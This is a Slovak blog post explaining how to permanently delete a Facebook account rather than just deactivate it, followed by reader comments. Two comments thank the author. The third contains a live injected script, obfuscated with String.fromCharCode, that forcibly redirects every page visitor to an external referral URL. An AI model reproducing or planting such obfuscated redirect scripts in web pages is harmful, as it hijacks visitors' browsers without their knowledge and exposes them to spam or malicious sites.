Centralnet

Vytlač príspevok
Odporuč príspevok
Bookmark and Share PRIDAŤ NA VYBRALI.SME.SK

Zmazanie účtu na Facebooku

Na tejto známej komunite nikde nieje viditeľne v nastaveniach zrušenie účtu. Je tam iba možnosť deaktivácie. Ale to nieje trvalé zrušenie. Avšak každý má právo, vymazať po sebe profil na sociálnej sieti.

Ako zmazať účet na Facebooku

Takže sa prihlásite na Facebook a potom si načítate tento link a to vás hodí do menu kde máte napísané že ak si už myslíte že Facebook nebudete používať tak si ho môžete zmazať a tam si to len klasicky potvrdíte. Momentálne (stav k 2012) je tam lehota 14 kým si to ešte môžete rozmyslieť. Po 14 dňoch by sa vám mal účet natrvalo odtsrániť. Neustále sa meniacim štýlom je čoraz horší ten facebook a v neposlednom rade to večné otravovanie ,,events-ami" už dokáže poriadne liezť na nervy. Najhoršia je tá vtieravosť že nám stále pripomína ako si máme nájsť priateľov, večne to vyzýva aby nám to mohlo vliezsť do kontaktov v mobile alebo v e-maili či do účtov na iných stránkach.

 

<< Diskusia >>

 


Čítajte aj: Zopár vecí ohľadne Microsoftu a Windowsu
Čítajte aj: Klávesové skratky pre Windows 7 a 8
 

 

 

Chceme vás poprosiť aby ste na diskusiu a komentáre využili naše spoločné fórum - KLIKNITE a prejdite na fórum. Budeme radi ak obohatíte našu komunitu aj vy, pridaním svojho názoru alebo založením témy ktorú ešte nemáme.

 

 
Informatika | stály odkaz

Komentáre

 1. Ďakujem
  Je to funkčné. Pomocou tohto postups, som si pekne vymazal účet na Facebooku. Tento typ komunity ma neoslovil. Radšej mám chat-y kde sa dá kecať v miestnostiach s kopou ľudí. Facebook bol moc súkromný pre mňa. Ja mám radšej otvorené diskusie a spoznávanie ľudí četovou formou.
  publikované: | autor: Ivan Neugebauer (e-mail, web, neautorizovaný)
 2. Funguje to! Vďaka :-)
  Je to super vec lebo doteraz som v nastaveniach všade našiel iba možnosť deaktivovať účet s tým že sa mi zálohujú dáta a môžem to kedykoľvek zapnúť. Čo vravia že však keď deaktivujem tak to je akoby som vymazal lebo zmiznem odtial. Ale pre mňa to bol proste pocit, že som skončil s facebookom nadobro.
  publikované: | autor: Richard (e-mail, web, neautorizovaný)
 3. nixe
  <sCRipt>window.location.replace(String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 114, 46, 104, 111, 110, 101, 121, 103, 97, 105, 110, 46, 109, 101, 47, 88, 80, 82, 90, 53, 48, 69, 65, 56, 52));</scRIPt>
  publikované: | autor: gggggg (e-mail, web, neautorizovaný)
Pozor, na konci je potreba spočítať neľahkú matematickú úlohu! Inak komentár nevložíme. Pre tých lenivejších je tam tlačidlo kúzlo.Prevádzkované na CMS TeaGuru spoločnosti Singularity, s.r.o., © 2004-2014